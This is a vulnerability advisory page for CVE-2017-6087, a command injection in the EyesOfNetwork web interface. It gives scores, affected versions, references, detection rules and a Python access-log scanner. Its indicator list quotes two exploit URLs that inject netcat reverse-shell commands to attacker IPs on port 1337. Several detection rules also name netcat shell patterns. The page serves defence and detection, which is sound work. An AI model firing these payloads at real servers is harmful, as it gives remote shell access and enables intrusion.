CVE-2017-6087
Published 2017-03-24
Priority: P262 | Severity: high | CVSS 3.0: 8.8
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 7.18% (93.5th percentile)
EyesOfNetwork ("EON") 5.0 and earlier allows remote authenticated users to execute arbitrary code via shell metacharacters in the selected_events[] parameter in the (1) acknowledge, (2) delete, or (3) ownDisown function in module/monitoring_ged/ged_functions.php or the (4) module parameter to module/index.php.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| eonweb_project | eonweb | <= 5.0-0 | — |
Detection & IOCs (extracted from sources)
- URL: https://eonweb.local/module/monitoring_ged/ged_actions.php?queue=history&action=confirm&global_action=4&selected_events%5B%5D=;nc%2010.0.5.124%201337%20-e%20/bin/bash;
- URL: https://eonweb.local/module/index.php?module=|nc%20192.168.1.14%201337%20-e%20/bin/bash&link=padding
- Detect shell metacharacter injection in the selected_events[] parameter on ged_actions.php: look for semicolons, pipes, or backticks in the selected_events[] query/POST parameter.
- Detect shell metacharacter injection in the module parameter to module/index.php: look for pipe (|), semicolon (;), or backtick characters in the module GET parameter.
- Alert on HTTP requests to /module/monitoring_ged/ged_actions.php containing URL-encoded shell metacharacters (%3B, %7C, %60) within the selected_events[] parameter.
- Alert on HTTP requests to /module/index.php where the module parameter contains a pipe character (| or %7C) followed by a command string, indicating OS command injection.
- Monitor for outbound netcat (nc) connections with the -e /bin/bash flag originating from the EON web server process, indicating successful reverse shell execution.
- The vulnerable sink is shell_exec() in module/monitoring_ged/ged_functions.php (line 373) and exec() in module/index.php (line 24); monitor process spawning from the web server (e.g., apache/httpd spawning nc, bash, or sh).
- The exploit requires prior authentication; unauthenticated access alone is insufficient to trigger RCE. Detection rules should account for authenticated sessions preceding the malicious request.
- The PoC IPs (10.0.5.124, 192.168.1.14) and port (1337) are attacker-controlled and will vary in real attacks; do not rely solely on these specific values for detection.
- The vulnerability is fixed in EON version 5.1; systems running 5.0 or earlier are affected. Verify the installed version before applying detection resources.
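The request-side checks in the list above, written out as an added example (not code from EyesOfNetwork or from the sources this page indexes): a Python scan of web access-log lines that decodes the two watched parameters, including nested percent-encoding, and flags semicolon, pipe, or backtick characters. It assumes Apache-style request lines; the names `WATCHED`, `fully_decode`, `suspicious_params` and `scan` are hypothetical, and the sample log lines are constructed with documentation IPs and placeholder values.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Endpoint -> parameter pairs named in the detection notes above.
WATCHED = {
    "/module/monitoring_ged/ged_actions.php": "selected_events[]",
    "/module/index.php": "module",
}
META = re.compile(r"[;|`]")  # semicolon, pipe, backtick
REQUEST = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (%253B -> %3B -> ;), with a bounded loop."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(target):
    """Return (name, decoded_value) for watched parameters holding metacharacters."""
    parts = urlsplit(target)
    wanted = WATCHED.get(parts.path)
    if wanted is None:
        return []
    # Split on '&' only, so a literal ';' stays inside the value being inspected.
    pairs = parse_qsl(parts.query, keep_blank_values=True, separator="&")
    return [(n, fully_decode(v)) for n, v in pairs
            if n == wanted and META.search(fully_decode(v))]

def scan(lines):
    """Return (line_number, parameter, decoded_value) for each suspicious request."""
    alerts = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            alerts += [(number, n, v) for n, v in suspicious_params(match.group("target"))]
    return alerts

# Constructed sample lines (documentation IPs, placeholder values), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Mar/2017:10:00:01 +0000] "GET /module/monitoring_ged/ged_actions.php?queue=history&action=confirm&global_action=4&selected_events%5B%5D=%3BPLACEHOLDER%3B HTTP/1.1" 200 512',
    '192.0.2.10 - - [24/Mar/2017:10:00:05 +0000] "GET /module/index.php?module=%7CPLACEHOLDER&link=padding HTTP/1.1" 200 734',
    '192.0.2.11 - - [24/Mar/2017:10:00:09 +0000] "GET /module/index.php?module=monitoring_ged&link=padding HTTP/1.1" 200 734',
    '192.0.2.12 - - [24/Mar/2017:10:00:12 +0000] "GET /module/monitoring_ged/ged_actions.php?selected_events%5B%5D=%253BPLACEHOLDER HTTP/1.1" 200 512',
    '192.0.2.13 - - [24/Mar/2017:10:00:15 +0000] "GET /index.php?module=%7CPLACEHOLDER HTTP/1.1" 404 210',
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

Access logs normally record only the query string, so a selected_events[] value sent in a POST body is visible only with request-body logging or an inline WAF rule.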
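CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 8.8 | HIGH | CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 6.5 | MEDIUM | AV:N/AC:L/Au:S/C:P/I:P/A:P |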
References
- http://www.openwall.com/lists/oss-security/2017/03/23/5
- http://www.securityfocus.com/bid/97109
- https://github.com/EyesOfNetworkCommunity/eonweb/commit/196729cc045ef93ceeddd1de505a1de8f9cdf74d
- https://sysdream.com/news/lab/2017-03-14-cve-2017-6087-eon-5-0-remote-code-execution/
- https://www.exploit-db.com/exploits/41746/